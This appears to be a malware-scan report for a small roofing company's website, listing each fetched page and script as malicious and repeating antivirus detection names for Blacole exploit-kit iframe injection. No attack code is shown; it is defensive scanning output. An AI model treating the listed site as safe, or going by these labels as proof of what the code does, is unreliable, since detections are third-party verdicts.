Request | Server response | Status |
http://ahighperformanceroofing.com/ | 200 OK Content-Length: 17959 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jsNavBarFuncs.js | 200 OK Content-Length: 14386 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/global_navtree.js | 200 OK Content-Length: 2939 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/wp_navbar_menub.js | 200 OK Content-Length: 17894 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jsFlashVer.js | 200 OK Content-Length: 9959 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jspngfix.js | 200 OK Content-Length: 2795 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/wpscripts/jsValidation.js | 200 OK Content-Length: 3073 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/index.html | 200 OK Content-Length: 17959 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/gutteringroofing.html | 200 OK Content-Length: 14108 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/Services.html | 200 OK Content-Length: 13757 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/contactus.html | 200 OK Content-Length: 15445 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://maps.google.com/maps/api/js?amp;vs=3.3&sensor=false | 200 OK Content-Length: 4901 Content-Type: text/javascript | clean |
http://ahighperformanceroofing.com/wpscripts/jsWPGoogleMaps.js | 200 OK Content-Length: 6592 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
- AntiVir: JS/BlacoleRef.W.40
- Avast: JS:Iframe-XK [Trj]
- Ikarus: Trojan.Script
- nProtect: JS:Exploit.JS.Blacole.S
- K7AntiVirus: Riskware
- TrendMicro-HouseCall: JS_IFRAMERE.SMJF
- Comodo: TrojWare.JS.Agent.GF
- McAfee-GW-Edition: JS/Exploit-Blacole.ht
- TrendMicro: JS_IFRAMERE.SMJF
- Kaspersky: HEUR:Trojan.Script.Iframer
- Microsoft: Trojan:JS/IframeRef.I
- MicroWorld-eScan: JS:Exploit.JS.Blacole.S
- Fortinet: JS/Blacole.GC!exploit
- McAfee: JS/Exploit-Blacole.ht
- NANO-Antivirus: Trojan.Script.Iframe.bcslpm
- F-Secure: JS:Exploit.JS.Blacole.S
- F-Prot: JS/IFrame.RS.gen
- AVG: HTML/Framer
- GData: JS:Exploit.JS.Blacole.S
- Commtouch: JS/IFrame.RS.gen
- BitDefender: JS:Exploit.JS.Blacole.S
|
http://ahighperformanceroofing.com/test404page.js | 404 Not Found Content-Length: 414 Content-Type: text/html | clean |